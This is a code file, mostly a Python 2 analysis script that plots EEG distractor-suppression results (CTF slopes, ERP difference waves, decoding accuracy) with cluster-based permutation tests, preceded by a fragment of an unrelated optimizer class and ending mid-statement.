) else: param_group["params"] = list(params) for param in param_group["params"]: if not isinstance(param, (torch.Tensor, crypten.CrypTensor)): raise TypeError( "optimizer can only optimize Tensors, " "but one of the params is " + torch.typename(param) ) for name, default in self.defaults.items(): if default is required and name not in param_group: raise ValueError( "parameter group didn't specify a value of required optimization parameter " + name ) else: param_group.setdefault(name, default) self.param_groups.append(param_group) DockyD/DvMprojects/EEGDistractorSuppression.py import os import sys sys.path.append('/home/dvmoors1/BB/ANALYSIS/DvM') import mne import glob import pickle import matplotlib matplotlib.use('agg') # now it works via ssh connection import numpy as np import scipy as sp import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from stats.nonparametric import * from eeg_analyses.helperFunctions import * from visuals.taskdisplays import * from visuals.visuals import MidpointNormalize from support.support import * from IPython import embed from scipy.stats import pearsonr from matplotlib import cm from mpl_toolkits.mplot3d import Axes3D from itertools import product from scipy.stats import ttest_rel from eeg_analyses.FolderStructure import FolderStructure # set general plotting parameters sns.set(font_scale=2.5) sns.set_style('ticks', {'xtick.major.size': 10, 'ytick.major.size': 10}) class EEGDistractorSuppression(FolderStructure): def __init__(self): pass def repetitionPlot(self, T, D, times, chance = 0, p_val = 0.05): ''' Standard main plots. A 2*2 visualization of the repetition effect. Top two graphs show analysis tuned to the target location. Bottom two graphs show analysis tuned to distractor location. Variable blocks are shown in blue, target repetition is shown in green and distractor repetition is shown in red. 
''' # initialize Permutation object PO = Permutation() # nice format for 2x2 subplots plt.figure(figsize = (15,10)) plt_idx = 1 y_lim = (-0.25,0.2) step = ((y_lim[1] - y_lim[0])/70.0) for to_plot in [T,D]: # set plotting colors and legend labels for plot in ['V','R']: # initialize subplot and beatify plots ax = plt.subplot(2,2 , plt_idx) ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=chance, color = 'black') plt.axvline(x= -250, color = 'black') # onset placeholders plt.axvline(x= 0, color = 'black') # onset gabors sns.despine(offset=50, trim = False) plt.ylim(y_lim) if plot == 'V': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'R': if plt_idx > 2: cnds, color = ['DrTv_0','DrTv_3'], 'red' elif plt_idx <= 2: cnds, color = ['DvTr_0','DvTr_3'], 'green' # loop over condititions for i, cnd in enumerate(cnds): err, diff = bootstrap(to_plot[cnd]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = cnd, color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # indicate significant clusters of individual timecourses sig_cl = PO.clusterBasedPermutation(to_plot[cnd], chance, p_val = 0.05) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * i), ls = ['-','--'][i], color = color) sig_cl = PO.clusterBasedPermutation(to_plot[cnds[0]], to_plot[cnds[1]], p_val = 0.01) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 2), color = 'black') sig_cl = PO.clusterBasedPermutation(to_plot[cnds[0]] - to_plot[cnds[1]], to_plot['DvTv_0'] - to_plot['DvTv_3'], p_val = 0.05, cl_p_val = 0.01) print sig_cl mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 3), color = 'grey') plt.legend(loc = 'best') # update plot counter plt_idx += 1 plt.tight_layout() def alphaSlopes(self): ''' Main analysis alpha band as reported in MS. CTF slopes is contrasted using cluster-based permutation in variable and repetition sequences bewteen the first and last repetition. 
''' # read in target repetition slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'target', ctf_name = 'cnds_*_slopes_alpha.pickle', fband = 'alpha') T = {} for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']: #T[cnd] = mne.filter.resample(np.vstack([slopes[i][cnd]['E_slopes'] for i in range(len(slopes))]), down = 4) T[cnd] = np.vstack([slopes[i][cnd]['total'] for i in range(len(slopes))]) # read in dist repetition slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'dist', ctf_name = 'cnds_*_slopes_alpha.pickle', fband = 'alpha') D = {} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']: #D[cnd] = mne.filter.resample(np.vstack([slopes[i][cnd]['E_slopes'] for i in range(len(slopes))]), down = 4) D[cnd] = np.vstack([slopes[i][cnd]['total'] for i in range(len(slopes))]) times = np.linspace(-300, 800, 141) - 250 #times = mne.filter.resample(times, down = 2) self.repetitionPlot(T,D, times) plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'alpha-slopes.pdf')) plt.close() def crossTraining(self): ''' Add description if included in MS ''' slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'target', ctf_name = '*_slopes-sub_cross.pickle', fband = 'alpha') plt.figure(figsize = (20,10)) for pl, cnd in enumerate(['DvTr_0','DvTr_3']): ax = plt.subplot(2,2 , pl + 1, title = cnd, ylabel = 'train time (ms)', xlabel = 'test time (ms)') X = np.stack([np.squeeze(slopes[i][cnd]['cross']) for i in range(len(slopes))]) #p_vals = signedRankArray(X, 0) X = np.mean(X, axis = 0) #X[p_vals > 0.05] = 0 plt.imshow(X, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],times[0],times[-1]], vmin = -0.3, vmax = 0.3) plt.colorbar() slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'dist', ctf_name = '*_slopes-sub_cross.pickle', fband = 'alpha') for pl, cnd in enumerate(['DrTv_0','DrTv_3']): ax = plt.subplot(2,2 , pl + 3, title = cnd, ylabel = 'train time (ms)', xlabel = 'test time (ms)') X = np.stack([np.squeeze(slopes[i][cnd]['cross']) for i in range(len(slopes))]) #p_vals = signedRankArray(X, 0) X = np.mean(X, axis = 0) #X[p_vals > 0.05] = 0 plt.imshow(X, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],times[0],times[-1]], vmin = -0.3, vmax = 0.3) plt.colorbar() plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'cross-training.pdf')) plt.close() def conditionCheck(self, window = (-0.3,0.8), thresh_bin = 1): ''' Checks the mimimum number of conditions after preprocessing ''' text = '' for sj in [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]: # read in beh with open(self.FolderTracker(extension = ['beh','processed'], filename = 'subject-{}_all.pickle'.format(sj)),'rb') as handle: beh = pickle.load(handle) # read in eeg data EEG = mne.read_epochs(self.FolderTracker(extension = ['processed'], filename = 'subject-{}_all-epo.fif'.format(sj))) # exclude trials contaminated by unstable eye position s, e = [np.argmin(abs(EEG.times - t)) for t in window] nan_idx = np.where(np.isnan(beh['eye_bins'])> 0)[0] heog = EEG._data[:,EEG.ch_names.index('HEOG'),s:e] eye_trials = eog_filt(beh, EEG, heog, sfreq = EEG.info['sfreq'], windowsize = 50, windowstep = 25, threshold = 30) beh['eye_bins'][eye_trials] = 99 # use mask to select conditions and position bins (flip array 
for nans) eye_mask = ~(beh['eye_bins'] > thresh_bin) # select conditions cnds = beh['condition'][eye_mask] min_cnd, cnd = min([sum(cnds == c) for c in np.unique(cnds)]), np.unique(cnds)[ np.argmin([sum(cnds== c) for c in np.unique(cnds)])] text += 'sj {}, min cnd is {} ({} trials, {}%) \n'.format(sj, cnd, min_cnd, min_cnd/612.0) with open('eye-{}.txt'.format(thresh_bin), 'a') as the_file: the_file.write(text) def inspectTimeCourse(self, plotting_data, times, y_lim = (-7,5), chance = 0, file = ''): ''' Creates general plotting structure. Left plot repetition 1 and 4 in variable condition. Middle plot repetition 1 and 4 in repeat condition. Right plot effect of repetition. Uses unique colors for variable and repetition blocks. Significant parts of the line are set to black. ''' # initialize Permutation object PO = Permutation() # nice format for 2x2 subplots plt.figure(figsize = (15,10)) step = ((y_lim[1] - y_lim[0])/70.0) # loop over variable and repetition plots and D and T blocks T_jasp, D_jasp = np.zeros((24,8)), np.zeros((24,8)) all_data = {'T':{},'D':{}} plt_idx = 1 for analysis in ['T', 'D']: # initialize subplot for plot in ['Var','Rep']: ax = plt.subplot(2,2 , plt_idx) # beautify plots ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=chance, color = 'grey') plt.axvline(x=-0.25, color = 'grey') # onset placeholders plt.axvline(x=0, color = 'grey') # onset gabors plt.ylim(y_lim) # set plotting colors and legend labels if plot == 'Var': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'Rep': if analysis == 'D': cnds, color = ['DrTv_0','DrTv_3'], 'red' elif analysis == 'T': cnds, color = ['DvTr_0','DvTr_3'], 'green' # loop over condititions for i, cnd in enumerate(cnds): all_data[analysis][cnd] = plotting_data[analysis][cnd] err, diff = bootstrap(plotting_data[analysis][cnd]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = '{}'.format(cnd), color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # indicate significant clusters of individual timecourses sig_cl = PO.clusterBasedPermutation(plotting_data[analysis][cnd], chance) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * i), ls = ['-','--'][i], color = color) file.write('{} vs {}: window = {} - {}'.format(cnd, chance, times[cl[0]],times[cl[-1]])) # plot the repetition effect sig_cl = PO.clusterBasedPermutation(all_data[analysis][cnds[1]], all_data[analysis][cnds[0]]) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 2), color = 'black') if cl.size != 0: file.write('repetition effect {}: window = {} - {} \n'.format(analysis, times[cl[0]],times[cl[-1]])) plt_idx += 1 plt.legend(loc = 'best') sns.despine(offset=50, trim = False) # plot the baseline effect (rep 3 - rep 0 vs baseline) sig_cl = PO.clusterBasedPermutation(all_data[analysis][cnds[1]] - all_data[analysis][cnds[0]], all_data[analysis]['DvTv_3'] - all_data[analysis]['DvTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 3), color = 'grey') if cl.size != 0: file.write('repetition effect baseline {}: window = {} - {} \n'.format(analysis, times[cl[0]],times[cl[-1]])) # plot the analysis effect sig_cl = 
PO.clusterBasedPermutation(all_data['T']['DvTr_0'], all_data['D']['DrTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 4), color = 'yellow') if cl.size != 0: file.write('D vs T rep 1 window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) sig_cl = PO.clusterBasedPermutation(all_data['T']['DvTr_3'], all_data['D']['DrTv_3']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 5), color = 'purple') if cl.size != 0: file.write('D vs T rep 4 window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) sig_cl = PO.clusterBasedPermutation(all_data['T']['DvTr_3'] - all_data['T']['DvTr_0'], all_data['D']['DrTv_3'] - all_data['D']['DrTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 6), color = 'brown') if cl.size != 0: file.write('D vs T repetition effect window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) file.close() plt.tight_layout() def inspectTimeCourseSEP(self, header, plotting_data, times, y_lim = (-7,5), chance = 0, analysis = ''): ''' Creates general plotting structure. Left plot repetition 1 and 4 in variable condition. Middle plot repetition 1 and 4 in repeat condition. Right plot effect of repetition. Uses unique colors for variable and repetition blocks. Significant parts of the line are set to black. ''' # initialize Permutation object PO = Permutation() # get height permutation bar h = (abs(y_lim[0] - y_lim[1]))/40.0/2 if header == 'target': rep_cnds = ['DvTr_0','DvTr_3'] rep_color = 'green' elif header == 'dist': rep_cnds = ['DrTv_0','DrTv_3'] rep_color = 'red' # loop over variable and repetition plots all_data = [] for idx, plot in enumerate(['Var','Rep']): # initialize plot #ax = plt.subplot(1,3 , idx + 1 ) #, title = plot, ylabel = 'mV') plt.figure(figsize = (15,5)) #ax = plt.subplot(1,1 , 1, xlabel = 'Time (ms)') #, title = plot, ylabel = 'mV') # beautify plots plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=chance, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.ylim(y_lim) plt.xlim((times[0],times[-1])) # set plotting colors and legend labels if plot == 'Var': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'Rep': cnds, color = rep_cnds, rep_color # loop over condititions for i, cnd in enumerate(cnds): all_data.append(plotting_data[cnd]) err, diff = bootstrap(all_data[-1]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = '{}'.format(cnd), color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # change parts of line that are significant sig_cl = PO.clusterBasedPermutation(all_data[-1], chance) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (0.08 + 0.01 * i), ls = ['-','--'][i], color = color) # add markers for significant clusters (condition repetition effect) sig_cl = PO.clusterBasedPermutation(all_data[-2], all_data[-1]) plt.fill_between(times, chance - 0.25, chance + 0.25, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') sns.despine(offset=50, trim = False) plt.tight_layout() 
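        # Note (added for clarity): throughout this class the output of
        # clusterBasedPermutation is turned into contiguous significant
        # clusters with the idiom
        #   mask = np.where(sig_cl < 1)[0]
        #   sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0] + 1)
        # i.e. indices flagged as significant (values < 1) are split wherever
        # consecutive indices are not adjacent. A toy illustration (assumed
        # input, not taken from the data):
        #   sig_cl = np.array([1, 0, 0, 1, 0])   # 0 marks a significant sample
        #   mask  -> array([1, 2, 4])
        #   split -> [array([1, 2]), array([4])]  # two separate clusters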
plt.savefig(self.FolderTracker([analysis,'MS-plots'], filename = '{}-{}.pdf'.format(header,plot))) # Compare variable and repetition plots (rep 1 - rep 4) plt.figure(figsize = (15,5)) ax = plt.subplot(1,1 ,1) #, title = 'Difference', ylabel = 'mV') # beatify plot plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') var = all_data[0] - all_data[1] rep = all_data[2] - all_data[3] for i, signal in enumerate([var, rep]): err, diff = bootstrap(signal) plt.plot(times, diff, label = ['var','rep'][i], color = ['blue', rep_color][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color =['blue', rep_color][i]) sig_cl = PO.clusterBasedPermutation(var, rep) # set new height permutation bar y_lim = ax.get_ylim() h = (abs(y_lim[0] - y_lim[1]))/40.0/2 plt.xlim((times[0],times[-1])) plt.fill_between(times, -h, h, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker([analysis,'MS-plots'], filename = '{}-plotdiff.pdf'.format(header))) ### DT comparison def DT(self): # initialize Permutation object PO = Permutation() embed() # read in target slopes slopes_t, info, times = self.ctfReader(sj_id = 'all',channels = 'all_channels_no-eye', header = 'target', cnd_name = 'cnds', ctf_name = 'slopes_alpha') slopes_d, info, times = self.ctfReader(sj_id = 'all',channels = 'all_channels_no-eye', header = 'dist', cnd_name = 'cnds', ctf_name = 'slopes_alpha') power = 'total' t_effect = np.vstack([slopes_t[i]['DvTr_3'][power] for i in range(len(slopes_t))]) #- np.vstack([slopes_t[i]['DvTr_3'][power] for i in range(len(slopes_t))]) d_effect = np.vstack([slopes_d[i]['DrTv_3'][power] for i in range(len(slopes_d))]) #- np.vstack([slopes_d[i]['DrTv_3'][power] for i in range(len(slopes_d))]) sig_cl = PO.clusterBasedPermutation(t_effect, d_effect) plt.figure(figsize = (15,5)) plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.xlim((times[0],times[-1])) plt.plot(times, t_effect.mean(0), label = 't_effect') err, diff = bootstrap(t_effect) plt.fill_between(times, diff + err, diff - err, alpha = 0.2) plt.plot(times, d_effect.mean(0), label = 'd_effect') err, diff = bootstrap(d_effect) plt.fill_between(times, diff + err, diff - err, alpha = 0.2) plt.fill_between(times, -0.05, 0.05, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = 'DTdiff.pdf')) plt.close() # read in decoding files = glob.glob(self.FolderTracker(['bdm', 'target_loc'], filename = 'class_*_perm-False.pickle')) bdmT = [] for file in files: with open(file ,'rb') as handle: bdmT.append(pickle.load(handle)) files = glob.glob(self.FolderTracker(['bdm', 'dist_loc'], filename = 'class_*_perm-False.pickle')) bdmD = [] for file in files: with open(file ,'rb') as handle: bdmD.append(pickle.load(handle)) T = np.stack([np.diag(bdmT[j]['DvTr_3']['standard']) for j in range(len(bdmT))]) D = np.stack([np.diag(bdmD[j]['DrTv_3']['standard']) for j in range(len(bdmD))]) sig_cl = PO.clusterBasedPermutation(D, T) # read in ERP erps_T, info, times = self.erpReader('target', 'lat-down1') erps_D, info, times = self.erpReader('target', 'lat-down1') elecs = ['PO7','PO3','O1'] e_idx = np.array([erps_T[erps_T.keys()[0]]['all']['elec'][0].index(e) for e in 
elecs]) ipsi = np.vstack([erps_T[str(key)]['DvTr_3']['ipsi'][e_idx].mean(0) for key in erps_T.keys()]) contra = np.vstack([erps_T[str(key)]['DvTr_3']['contra'][e_idx].mean(0) for key in erps_T.keys()]) T = contra - ipsi ipsi = np.vstack([erps_D[str(key)]['DrTv_3']['ipsi'][e_idx].mean(0) for key in erps_D.keys()]) contra = np.vstack([erps_D[str(key)]['DrTv_3']['contra'][e_idx].mean(0) for key in erps_D.keys()]) D = contra - ipsi sig_cl = PO.clusterBasedPermutation(D, T) plt.figure(figsize = (15,5)) #ax = plt.subplot(1,1 , 1, xlabel = 'Time (ms)') #, title = plot, ylabel = 'mV') # beautify plots plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.xlim((times[0],times[-1])) plt.fill_between(times, -1, -2, where = sig_cl < 1, color = 'black') plt.savefig(self.FolderTracker(['poster', 'erp'], filename = 'DTdiff.pdf')) plt.close() def diff_ERPS(self, elecs, erp_name, y_lim = (-5,2)): ''' plots ERP difference waves (contra - ipsi) for the repeat and the variable sequences seperately. Calls inspectTimeCourse to visualize the condition comparisons and plot the significant clusters. Arguments - - - - - elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # open file to store timing of significant clusters f = open(self.FolderTracker(['erp','MS-plots'], filename = 'main_erp-{}.txt'.format(erp_name)),'w') # read in data and shift timing embed() T_erps, info, times = self.erpReader('target', erp_name) D_erps, info, times = self.erpReader('dist', erp_name) # get indices of electrodes of interest e_idx = np.array([T_erps[T_erps.keys()[0]]['all']['elec'][0].index(e) for e in elecs]) # plot difference wave form collapsed across all conditions ipsi_T = np.mean(np.stack(([[T_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in T_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']])),0) contra_T =np.mean(np.stack(([[T_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in T_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']])),0) ipsi_D = np.mean(np.stack(([[D_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in D_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']])),0) contra_D =np.mean(np.stack(([[D_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in D_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']])),0) plt.figure(figsize = (15,5)) for i, effect in enumerate([contra_T - ipsi_T, contra_D - ipsi_D]): sig_cl = PO.clusterBasedPermutation(effect, 0) ax = plt.subplot(1,2 ,i + 1) # beautify plots ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=0, color = 'grey') plt.axvline(x=-0.25, color = 'grey') # onset placeholders plt.axvline(x=0, color = 'grey') # onset gabors plt.ylim(y_lim) err, diff = bootstrap(effect) plt.plot(times, diff, color = ['green', 'red'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = ['green', 'red'][i]) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for j, cl in enumerate(sig_cl): if i == 0: self.ERPJASP(T_erps, cl, ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'], e_idx, 'target', j, nr_sj = 24) elif i == 1: self.ERPJASP(D_erps, cl, ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'], e_idx, 'dist', j, nr_sj = 24) plt.plot(times[cl], np.ones(cl.size) * (y_lim[0]), color = ['green', 'red'][i]) sns.despine(offset=50, trim = 
False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'main_allerp-{}.pdf'.format(erp_name))) plt.close() # get plotting data plotting_data = {'T':{},'D':{}} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3','DvTr_0','DvTr_3']: if e_idx.size > 1: ipsi_T = np.vstack([T_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in T_erps.keys()]) contra_T = np.vstack([T_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in T_erps.keys()]) ipsi_D = np.vstack([D_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in D_erps.keys()]) contra_D = np.vstack([D_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in D_erps.keys()]) else: ipsi_T = np.vstack([T_erps[str(key)][cnd]['ipsi'][e_idx] for key in T_erps.keys()]) contra_T = np.vstack([T_erps[str(key)][cnd]['contra'][e_idx] for key in T_erps.keys()]) ipsi_D = np.vstack([D_erps[str(key)][cnd]['ipsi'][e_idx] for key in D_erps.keys()]) contra_D = np.vstack([D_erps[str(key)][cnd]['contra'][e_idx] for key in D_erps.keys()]) plotting_data['T'][cnd] = contra_T - ipsi_T plotting_data['D'][cnd] = contra_D - ipsi_D self.inspectTimeCourse(plotting_data, times, y_lim = y_lim, chance = 0, file = f) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'main_erp-{}.pdf'.format(erp_name))) plt.close() def ERPJASP(self, erps, cluster, cnds, e_idx, header, clust_nr, nr_sj = 24): ''' Select contra and ipsi waveforms for JASP analysis ''' JASP = np.zeros((nr_sj, len(cnds)*2)) for i, cnd in enumerate(cnds): ipsi = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx, cluster[0]:cluster[-1]].mean() for key in erps.keys()]) contra = np.vstack([erps[str(key)][cnd]['contra'][e_idx, cluster[0]:cluster[-1]].mean() for key in erps.keys()]) JASP[:,i*2] = ipsi.T JASP[:, i + (i + 1)] = contra.T headers = ['_'.join(np.array(labels,str)) for labels in product(*[cnds,['ipsi','contra']])] np.savetxt(self.FolderTracker(['erp','MS-plots'], filename = '{}_cl{}-JASP.csv'.format(header, clust_nr)), JASP, delimiter = "," ,header = ",".join(headers), comments='') def bdmdiag(self): ''' ''' # read in data with open(self.FolderTracker(['bdm','{}_loc'.format('target')], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format('target')], filename = 'class_*_perm-False.pickle')) bdm_T = [] for file in files: with open(file ,'rb') as handle: bdm_T.append(pickle.load(handle)) files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format('dist')], filename = 'class_*_perm-False.pickle')) bdm_D = [] for file in files: with open(file ,'rb') as handle: bdm_D.append(pickle.load(handle)) # get plotting data plotting_data = {'T':{},'D':{}} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']: plotting_data['D'][cnd] = np.stack([np.diag(bdm_D[j][cnd]['standard']) for j in range(len(bdm_D))]) for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']: plotting_data['T'][cnd] = np.stack([np.diag(bdm_T[j][cnd]['standard']) for j in range(len(bdm_T))]) # open file to store timing of significant clusters f = open(self.FolderTracker(['bdm','MS-plots'], filename = 'diag-bdm.txt'),'w') self.inspectTimeCourse(plotting_data, times, y_lim = (0.1, 0.3), chance = 1/6.0, file = f) plt.savefig(self.FolderTracker(['bdm','MS-plots'], filename = 'diag-bdm.pdf')) plt.close() def bdmACC(self, header): ''' ''' PO = Permutation() if header == 'target': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] # read in data with 
open(self.FolderTracker(['bdm','{}_loc'.format(header)], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format(header)], filename = 'class_*_perm-False.pickle')) bdm = [] for file in files: with open(file ,'rb') as handle: bdm.append(pickle.load(handle)) #plt.figure(figsize = (20,10)) perm = [] plt_idx = [1,2,4,5] X2 = 1/6.0 # normalize colorbar norm = MidpointNormalize(midpoint=X2) data = [] for i, cnd in enumerate(conditions): plt.figure(figsize = (10,10)) #ax = plt.subplot(2,3 , plt_idx[i])#, title = cnd, ylabel = 'Time (ms)', xlabel = 'Time (ms)') #ax.tick_params(direction = 'in', length = 5) plt.tick_params(direction = 'in', length = 5) X1 = np.stack([bdm[j][cnd]['standard'] for j in range(len(bdm))])[:, times >= 0, :][:,:,times >= 0] data.append(X1) p_vals = signedRankArray(X1, X2) h,_,_,_ = FDR(p_vals) dec = np.mean(X1,0) dec[~h] = X2 plt.imshow(dec, norm = norm, cmap = cm.bwr, interpolation='none', aspect='auto', origin = 'lower', extent=[0,times[-1],0,times[-1]], vmin = 0.1, vmax = 0.3) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-plot{}.pdf'.format(header,cnd))) plt.close() plt_idx = [3,6] for i, cnd in enumerate(['var','rep']): plt.figure(figsize = (10,10)) #ax = plt.subplot(2,3 , plt_idx[i])#, title = cnd, ylabel = 'Time (ms)', xlabel = 'Time (ms)') #ax.tick_params(direction = 'in', length = 0.5) plt.tick_params(direction = 'in', length = 0.5) if i == 0: X, Y = data[0], data[1] else: X, Y = data[2], data[3] sig_cl = PO.clusterBasedPermutation(X,Y) x = times[times > 0] X = np.tile(x,(x.size,1)).T Y = np.tile(x,(len(x),1)) Z = sig_cl.T plt.contour(X,Y,Z,1) #plt.imshow(sig_cl, interpolation='none', aspect='auto', # origin = 'lower', extent=[0,times[-1],0,times[-1]]) #plt.coloribar() #plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-diffplot{}.pdf'.format(header,cnd))) plt.close() # plot repetition effect plt.figure(figsize = (10,10)) plt.tick_params(direction = 'in', length = 0.5) sig_cl = PO.clusterBasedPermutation(data[0] - data[1],data[2] - data[3]) x = times[times > 0] X = np.tile(x,(x.size,1)).T Y = np.tile(x,(len(x),1)) Z = sig_cl.T plt.contour(X,Y,Z,1) plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-diffplot-rep3.pdf'.format(header))) plt.close() #plt.tight_layout() #plt.savefig(self.FolderTracker(['bdm','MS-plots'], filename = 'class_{}.pdf'.format(header))) #plt.close() ### EXTRA ANALYSIS def cndTOPO(self, header, topo_name = 'topo_lat-down1', start = -0.1, stop = 0.15, step = 0.01): ''' ''' # get conditions of interest if header == 'target': cnds = ['DvTv_0', 'DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': cnds = ['DvTv_0', 'DvTv_3','DrTv_0','DrTv_3'] # define segments segments = np.arange(start, stop, step) # read in data and shift timing topo, info, times = self.erpReader(header, topo_name) # create figure plt.figure(figsize = (50,20)) # loop over conditions idx_cntr = 1 for cnd in cnds: # loop over time segments for start_seg in segments: # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (start_seg,start_seg+0.01)] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j][cnd][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) if cnd == 'DvTv_0': ax = plt.subplot(len(cnds), segments.size ,idx_cntr, title = '{0:.2f}'.format(start_seg)) else: ax = plt.subplot(len(cnds), segments.size ,idx_cntr) im = 
